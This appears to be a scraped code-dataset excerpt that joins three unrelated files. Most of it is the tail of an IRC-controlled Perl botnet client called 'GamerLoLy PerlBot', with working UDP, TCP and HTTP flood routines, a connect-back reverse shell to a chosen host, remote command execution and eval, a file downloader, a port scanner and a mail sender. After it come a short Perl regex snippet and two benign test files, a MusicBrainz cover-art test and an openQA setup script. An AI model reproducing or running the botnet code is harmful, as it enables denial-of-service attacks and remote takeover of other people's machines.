sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1======================= ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1GamerLoLy PerlBot - Main Help: ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1======================= ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1system ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1version ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1channel ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1flood ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1utils ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1======================= ");
}
if ($funcarg =~ /^system/) {
$uptime=`uptime`;
$ownd=`pwd`;
$id=`id`;
$uname=`uname -srp`;
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1=================== ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1Bot Configuration: ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1=================== ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1*Server : 12$server");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1*Port : 12$port");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1*Channels : 12@channels");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1*uname -a : 12$uname");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1*uptime : 12$uptime");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1*FakeProcess : 12$process");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1*ProcessPID : 12$$");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1*ID : 12$id");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1*Own Dir : 12$ownd");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [System] 9,1=================== ");
}
if ($funcarg =~ /^version/){
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Version] 9,1================================== ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Version] 9,1Bot Informations: ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Version] 9,1================================== ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Version] 9,1*Bot Version : 12$version ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Version] 9,1*Bot Creator : 12GamerLoLy ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Version] 9,1*Bot Year : 122012 ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Version] 9,1================================== ");
}
if ($funcarg =~ /^flood/) {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1GamerLoLy PerlBot - Flood Help: ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp1 <ip> <port> <time> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp2 <ip> <packet size> <time> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1udp3 <ip> <port> <time> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1tcp <ip> <port> <packet size> <time> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1http <site> <time> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1ctcpflood <nick> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1msgflood <nick> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1noticeflood <nick> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1========================================= ");
}
if ($funcarg =~ /^channel/) {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1============================= ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1GamerLoLy PerlBot - Channel Help: ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1============================= ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1join <channel> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1part <channel> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1rejoin <channel> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1op <channel> <nick> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1deop <channel> <nick> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1voice <channel> <nick> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1devoice <channel> <nick> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1nick <newnick> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1msg <nick> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1quit ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12!9,1die ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1============================= ");
}
if ($funcarg =~ /^utils/) {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1================================================== ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1GamerLoLy PerlBot - Utils Help: ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1================================================== ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1cback <ip> <port> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1download <url+path> <file> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1mail <subject> <sender> <recipient> <message> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1dns <ip> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1port <ip> <port> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u 12@9,1portscan <ip> ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1!u pwd (for example) ");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Help] 9,1================================================== ");
}
#########################
##### [ Functions ] #####
#########################
if ($funcarg =~ /^die/) {
sendraw($IRC_cur_socket,"QUIT :");
$killd ="kill -9".fork;
system (`$killd`);
}
###########
if ($funcarg =~ /^join (.*)/) {
sendraw($IRC_cur_socket,"JOIN".$1);
}
if ($funcarg =~ /^part (.*)/) {
sendraw($IRC_cur_socket,"PART".$1);
}
###########
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("1","7","9","14","20","21","22","23","25","53","80","88","110","112","113","137","143","145","222","333","405","443","444","445","512","587","616","666","993","995","1024","1025","1080","1144","1156","1222","1230","1337","1348","1628","1641","1720","1723","1763","1983","1984","1985","1987","1988","1990","1994","2005","2020","2121","2200","2222","2223","2345","2360","2500","2727","3130","3128","3137","3129","3303","3306","3333","3389","4000","4001","4471","4877","5252","5522","5553","5554","5642","5777","5800","5801","5900","5901","6062","6550","6522","6600","6622","6662","6665","6666","6667","6969","7000","7979","8008","8080","8081","8082","8181","8246","8443","8520","8787","8855","8880","8989","9855","9865","9997","9999","10000","10001","10010","10222","11170","11306","11444","12241","12312","14534","14568","15951","17272","19635","19906","19900","20000","21412","21443","21205","22022","30999","31336","31337","32768","33180","35651","36666","37998","41114","41215","44544","45055","45555","45678","51114","51247","51234","55066","55555","65114","65156","65120","65410","65500","65501","65523","65533");
my (@aberta, %porta_banner);
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [PortScan] 9,1Scanning for open ports on 12".$1."9,1started. ");
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [PortScan] 9,1Open ports found: 12@aberta ");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [PortScan] 9,1No open ports found. ");
}
}
##############
if ($funcarg =~ /^download\s+(.*)\s+(.*)/) {
getstore("$1","$2");
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Download] 9,1Downloaded the file: 12$2 9,1from 12$1 ");
}
##############
if ($funcarg =~ /^dns\s+(.*)/){
my $nsku = $1;
$mydns = inet_ntoa(inet_aton($nsku));
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [DNS] 9,1Resolved: 12$nsku 9,1to 12$mydns ");
}
##############
if ($funcarg=~ /^port\s+(.*?)\s+(.*)/ ) {
my $hostip="$1";
my $portsc="$2";
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $portsc, Proto =>'tcp', Timeout => 7);
if ($scansock) {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [PORT] 9,1Connection to 12$hostip9,1:12$portsc 9,1is 12Accepted. ");
}
else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [PORT] 9,1Connection to 12$hostip9,1:12$portsc 9,1is 4Refused. ");
}
}
##############
if ($funcarg =~ /^udp1\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
my $alvo=inet_aton("$1");
my $porta ="$2";
my $dtime ="$3";
my $pacote;
my $pacotese;
my $size = 0;
my $fim = time + $dtime;
my $pacota = 1;
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [UDP Attack] 9,1Attacking 12".$1."9,1On Port 12".$porta."9,1for 12".$dtime."9,1seconds. ");
while (($pacota =="1") && ($pacotes =="1")) {
$pacota = 0 if ((time >= $fim) && ($dtime !="0"));
$pacote = $size ? $size : int(rand(1024-64)+64) ;
$porta = int(rand 65000) +1 if ($porta =="0");
#send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo));
send(Tr0x, pack("a$pacote","Tr0x"), 0, pack_sockaddr_in($porta, $alvo));
}
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [UDP Attack] 9,1Attack for 12".$1."9,1finished in 12".$dtime."9,1seconds9,1. ");
}
##############
if ($funcarg =~ /^udp2\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [UDP Attack] 9,1Attacking 12".$1."9,1with 12".$2."9,1Kb Packets for 12".$3."9,1seconds. ");
my ($dtime, %pacotes) = udpflooder("$1","$2","$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [UDP Attack] 9,1Results 12".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)."9,1Kb in 12".$dtime."9,1seconds to 12".$1."9,1. ");
}
##############
if ($funcarg =~ /^udp3\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
my $alvo=inet_aton("$1");
my $porta ="$2";
my $dtime ="$3";
my $pacote;
my $pacotese;
my $fim = time + $dtime;
my $pacota = 1;
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [UDP Attack] 9,1Attacking 12".$1."9,1On Port 12".$porta."9,1for 12".$dtime."9,1seconds. ");
while (($pacota =="1") && ($pacotes =="1")) {
$pacota = 0 if ((time >= $fim) && ($dtime !="0"));
$pacote= $rand x $rand x $rand;
$porta = int(rand 65000) +1 if ($porta =="0");
send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes =="1");
}
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [UDP Attack] 9,1Results 12".$pacotese."9,1Kb in 12".$dtime."9,1seconds to 12".$1."9,1. ");
}
##############
##############
if ($funcarg =~ /^tcp\s+(.*)\s+(\d+)\s+(\d+)/) {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [TCP Attack] 9,1Attacking 12".$1.":".$2."9,1for 12".$3."9,1seconds. ");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($3>$cur_time){
$cur_time = time - $itime;
&tcpflooder("$1","$2","$3");
}
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [TCP Attack] 9,1Attack ended on: 12".$1.":".$2."9,1. ");
}
##############
if ($funcarg =~ /^http\s+(.*)\s+(\d+)/) {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1[HTTP Attack] 9,1Attacking 12".$1."9,1on port 80 for 12".$2."9,1seconds. ");
my $itime = time;
my ($cur_time);
$cur_time = time - $itime;
while ($2>$cur_time){
$cur_time = time - $itime;
my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
print $socket"GET / HTTP/1.1\r\nAccept: */*\r\nHost:".$1."\r\nConnection: Keep-Alive\r\n\r\n";
close($socket);
}
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [HTTP Attack] 9,1Attacking ended on: 12".$1."9,1. ");
}
##############
if ($funcarg =~ /^cback\s+(.*)\s+(\d+)/) {
my $host ="$1";
my $port ="$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);
my $shell ="/bin/sh -i";
if ($^O eq"MSWin32") {
$shell ="cmd.exe";
}
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [ConnectBack] 9,1Connecting to 12$host:$port ");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die"socket: $!";
connect(SOCKET, $paddr) or die"connect: $!";
open(STDIN,">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("$shell");
close(STDIN);
close(STDOUT);
close(STDERR);
}
##############
if ($funcarg =~ /^mail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) {
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Mailer] 9,1Sending email to: 12$3 ");
$subject = $1;
$sender = $2;
$recipient = $3;
@corpo = $4;
$mailtype ="content-type: text/html";
$sendmail = '/usr/sbin/sendmail';
open (SENDMAIL,"| $sendmail -t");
print SENDMAIL"$mailtype\n";
print SENDMAIL"Subject: $subject\n";
print SENDMAIL"From: $sender\n";
print SENDMAIL"To: $recipient\n\n";
print SENDMAIL"@corpo\n\n";
close (SENDMAIL);
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [Mailer] 9,1Email Sended to: 12$recipient ");
}
exit;
}
}
##############
if ($funcarg =~ /^ctcpflood (.*)/) {
my $target ="$1";
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [IRCFlood] 9,1CTCP Attacking: 12".$target."");
for (1..10) {
sendraw($IRC_cur_socket,"PRIVMSG".$target.":\001VERSION\001\n");
sendraw($IRC_cur_socket,"PRIVMSG".$target.":\001PING\001\n");
}
}
##############
if ($funcarg =~ /^msgflood (.*)/) {
my $target ="$1";
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [IRCFlood] 9,1MSG Flooding: 12".$target."");
sendraw($IRC_cur_socket,"PRIVMSG".$target.":0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...");
}
##############
if ($funcarg =~ /^noticeflood (.*)/) {
my $target ="$1";
sendraw($IRC_cur_socket,"PRIVMSG $printl :4,1 [IRCFlood] 9,1NOTICE Flooding: 12".$target."");
for (1..2){
sendraw($IRC_cur_socket,"NOTICE".$target.":0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...8,7...9,6....0,15...1,16...2,13...3,12...4,11...5,10...6,9...7,8...");
}
}
##############
##############
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
elsif ($case =~ /^part (.*)/) {
p("$1");
}
elsif ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
elsif ($case =~ /^op/) {
op("$printl","$kem") if $case eq"op";
my $oarg = substr($case, 3);
op("$1","$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^deop/) {
deop("$printl","$kem") if $case eq"deop";
my $oarg = substr($case, 5);
deop("$1","$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^voice/) {
voice("$printl","$kem") if $case eq"voice";
$oarg = substr($case, 6);
voice("$1","$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^devoice/) {
devoice("$printl","$kem") if $case eq"devoice";
$oarg = substr($case, 8);
devoice("$1","$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1","$2");
}
elsif ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2","$3");
}
}
elsif ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1","$2");
}
elsif ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2","$3");
}
}
elsif ($case =~ /^invite\s+(\S+) (.*)/) {
invite("$1","$2");
}
elsif ($case =~ /^newerver\s+(\S+)\s+(\S+)/) {
conectar("$2","$1","6667");
}
elsif ($case =~ /^nick (.*)/) {
nick("$1");
}
elsif ($case =~ /^raw (.*)/) {
sendraw("$1");
}
elsif ($case =~ /^eval (.*)/) {
eval"$1";
}
elsif ($case =~ /^join\s+(\S+)\s+(\d+)/) {
sleep int(rand($2));
j("$1");
}
elsif ($case =~ /^part\s+(\S+)\s+(\d+)/) {
sleep int(rand($2));
p("$1");
}
elsif ($case =~ /^quit/) {
quit();
}
}
##############
sub shell {
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl","No such file or directory");
return;
} elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket,"PRIVMSG $printl :$linha");
if ($c =="$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
##############
sub udpflooder {
my $iaddr = inet_aton($_[0]);
my $msg = 'A' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $port = 1;
$port <= 65000; $port++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{igmp}++;
send(SOCK2, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{udp}++;
send(SOCK3, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{icmp}++;
send(SOCK4, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{tcp}++;
for (my $pc = 3;
$pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($port, $iaddr)) and $pacotes{o}++;
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
##############
sub tcpflooder {
my $itime = time;
my ($cur_time);
my ($ia,$pa,$proto,$j,$l,$t);
$ia=inet_aton($_[0]);
$pa=sockaddr_in($_[1],$ia);
$ftime=$_[2];
$proto=getprotobyname('tcp');
$j=0;$l=0;
$cur_time = time - $itime;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
socket($t,PF_INET,SOCK_STREAM,$proto);
connect($t,$pa)||$j--;
$j++;$l++;
}
$l=0;
while ($l<1000){
$cur_time = time - $itime;
last if $cur_time >= $ftime;
$t="SOCK$l";
shutdown($t,2);
$l++;
}
}
##############
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub voice {
return unless $#_ == 1;
sendraw("MODE $_[0] +v $_[1]");
}
sub devoice {
return unless $#_ == 1;
sendraw("MODE $_[0] -v $_[1]");
}
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {sendraw("PART $_[0]");}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub quit {
sendraw("QUIT :$_[0]");
exit;
}
sub modo {
return unless $#_ == 0;
sendraw("MODE $_[0] $_[1]");
}
sub mode { modo(@_); }
sub invite {
return unless $#_ == 1;
sendraw("INVITE $_[1] $_[0]");
}
sub topico {
return unless $#_ == 1;
sendraw("TOPIC $_[0] $_[1]");
}
sub topic { topico(@_); }
sub away {
sendraw("AWAY $_[0]");
}
sub back { away(); }
}
###################
##### [ EOF ] #####
###################
| 47.713519 | 1,131 | 0.454654 |
ed8b72d6b82b7978d01f157cac01b6fe980d417e | 167 | pl | Perl | perl/dash-or-space/foo.pl | trammell/test | ccac5e1dac947032e64d813e53cb961417a58d05 | [
"Artistic-2.0"
] | null | null | null | perl/dash-or-space/foo.pl | trammell/test | ccac5e1dac947032e64d813e53cb961417a58d05 | [
"Artistic-2.0"
] | null | null | null | perl/dash-or-space/foo.pl | trammell/test | ccac5e1dac947032e64d813e53cb961417a58d05 | [
"Artistic-2.0"
] | null | null | null | #!/usr/bin/perl -l
use strict;
use warnings FATAL => 'all';
my $cc = "1234 5678 1234 5678";
$cc =~ s/[-\s]//g; # sweet, \s works in character classes
print $cc;
| 13.916667 | 58 | 0.598802 |
ed6375ed661e17d604edb68ba90db28bc835599f | 3,062 | pm | Perl | t/lib/t/MusicBrainz/Server/Controller/Release/ReorderCoverArt.pm | qls0ulp/musicbrainz-server | ebe8a45bf6f336352cd5c56e2e825d07679c0e45 | [
"BSD-2-Clause"
] | null | null | null | t/lib/t/MusicBrainz/Server/Controller/Release/ReorderCoverArt.pm | qls0ulp/musicbrainz-server | ebe8a45bf6f336352cd5c56e2e825d07679c0e45 | [
"BSD-2-Clause"
] | null | null | null | t/lib/t/MusicBrainz/Server/Controller/Release/ReorderCoverArt.pm | qls0ulp/musicbrainz-server | ebe8a45bf6f336352cd5c56e2e825d07679c0e45 | [
"BSD-2-Clause"
] | 1 | 2021-02-24T13:14:25.000Z | 2021-02-24T13:14:25.000Z | package t::MusicBrainz::Server::Controller::Release::ReorderCoverArt;
use Test::Routine;
use Test::More;
use MusicBrainz::Server::Test qw( capture_edits );
with 't::Context', 't::Mechanize';
test 'Test reordering cover art' => sub {
my $test = shift;
my $c = $test->c;
my $mech = $test->mech;
MusicBrainz::Server::Test->prepare_test_database($c, <<'EOSQL');
INSERT INTO editor (id, name, password, privs, email, website, bio, email_confirm_date, member_since, last_login_date, ha1) VALUES (1, 'new_editor', '{CLEARTEXT}password', 0, 'test@editor.org', 'http://musicbrainz.org', 'biography', '2005-10-20', '1989-07-23', now(), 'e1dd8fee8ee728b0ddc8027d3a3db478');
INSERT INTO artist (id, gid, name, sort_name)
VALUES (1, '945c079d-374e-4436-9448-da92dedef3cf', 'Artist', 'Artist');
INSERT INTO artist_credit (id, name, artist_count) VALUES (1, 'Artist', 1);
INSERT INTO artist_credit_name (artist_credit, position, artist, name, join_phrase)
VALUES (1, 0, 1, 'Artist', '');
INSERT INTO release_group (id, gid, name, artist_credit)
VALUES (1, '54b9d183-7dab-42ba-94a3-7388a66604b8', 'Release', 1);
INSERT INTO release (id, gid, name, artist_credit, release_group)
VALUES (1, '14b9d183-7dab-42ba-94a3-7388a66604b8', 'Release', 1, 1);
INSERT INTO edit (id, editor, type, status, expire_time) VALUES (1, 1, 316, 2, now());
INSERT INTO edit_data (edit, data) VALUES (1, '{}');
INSERT INTO cover_art_archive.image_type (mime_type, suffix) VALUES ('image/jpeg', 'jpg');
INSERT INTO cover_art_archive.cover_art (id, release, mime_type, edit, ordering)
VALUES (12345, 1, 'image/jpeg', 1, 1), (12346, 1, 'image/jpeg', 1, 2);
EOSQL
$mech->get_ok('/login');
$mech->submit_form( with_fields => { username => 'new_editor', password => 'password' } );
$mech->get_ok('/release/14b9d183-7dab-42ba-94a3-7388a66604b8/reorder-cover-art');
my @edits = capture_edits {
$mech->submit_form(
with_fields => {
'reorder-cover-art.artwork.0.id' => 12345,
'reorder-cover-art.artwork.0.position' => 1,
'reorder-cover-art.artwork.1.id' => 12346,
'reorder-cover-art.artwork.1.position' => 2,
}
);
} $c;
is(@edits, 0, 'does not create edit without changes');
$mech->get_ok('/release/14b9d183-7dab-42ba-94a3-7388a66604b8/reorder-cover-art');
@edits = capture_edits {
$mech->submit_form(
with_fields => {
'reorder-cover-art.artwork.0.id' => 12345,
'reorder-cover-art.artwork.0.position' => 2,
'reorder-cover-art.artwork.1.id' => 12346,
'reorder-cover-art.artwork.1.position' => 1,
}
);
} $c;
is(@edits, 1);
my ($edit) = @edits;
isa_ok($edit, 'MusicBrainz::Server::Edit::Release::ReorderCoverArt');
my $data = $edit->data;
is_deeply(
$data->{new},
[ { id => 12345, position => 2 } ,
{ id => 12346, position => 1 } ],
'Correctly reorders artwork');
};
1;
| 38.275 | 304 | 0.623122 |
ed55caffb72e2ebfbe1befff1d7672daa9d48581 | 819 | pm | Perl | tests/rt/add_product.pm | acerv/os-autoinst-distri-opensuse | 0e0cfca02f3a86323682c511a1efa926c7f0df3a | [
"FSFAP"
] | 84 | 2015-02-10T16:01:52.000Z | 2022-03-10T21:20:14.000Z | tests/rt/add_product.pm | acerv/os-autoinst-distri-opensuse | 0e0cfca02f3a86323682c511a1efa926c7f0df3a | [
"FSFAP"
] | 8,065 | 2015-01-07T07:44:02.000Z | 2022-03-31T12:02:06.000Z | tests/rt/add_product.pm | acerv/os-autoinst-distri-opensuse | 0e0cfca02f3a86323682c511a1efa926c7f0df3a | [
"FSFAP"
] | 404 | 2015-01-14T14:42:44.000Z | 2022-03-30T07:38:08.000Z | # SUSE's openQA tests
#
# Copyright 2021 SUSE LLC
# SPDX-License-Identifier: FSFAP
#
# Summary: Add RT product installation workaround
# Maintainer: QE Kernel <kernel-qa@suse.de>
use base 'opensusebasetest';
use strict;
use warnings;
use testapi;
sub run() {
record_soft_failure 'poo#96158 - Adding RT product to control.xml';
assert_screen 'startshell', 90;
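    # The first sed below slurps control.xml into the hold space
    # ('/./{H;$!d} ; x') so the substitution can match across line breaks,
    # then inserts a SLE_RT <base_product> entry just before the closing
    # </base_products> tag; the second sed drops the blank first line that
    # the hold-space trick leaves behind.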
assert_script_run 'sed -i \'/./{H;$!d} ; x ; s/\s*<\/base_product>\s*<\/base_products>/<\/base_product><base_product><display_name>SUSE Linux Enterprise Real Time 15 SP3<\/display_name><name>SLE_RT<\/name><version>15\.3<\/version><register_target>sle-15-\$arch<\/register_target><archs>x86_64<\/archs><\/base_product><\/base_products>/\' control.xml';
assert_script_run 'sed -i \'1d\' control.xml';
script_run 'exit', timeout => 0;
}
1;
| 35.608696 | 355 | 0.710623 |
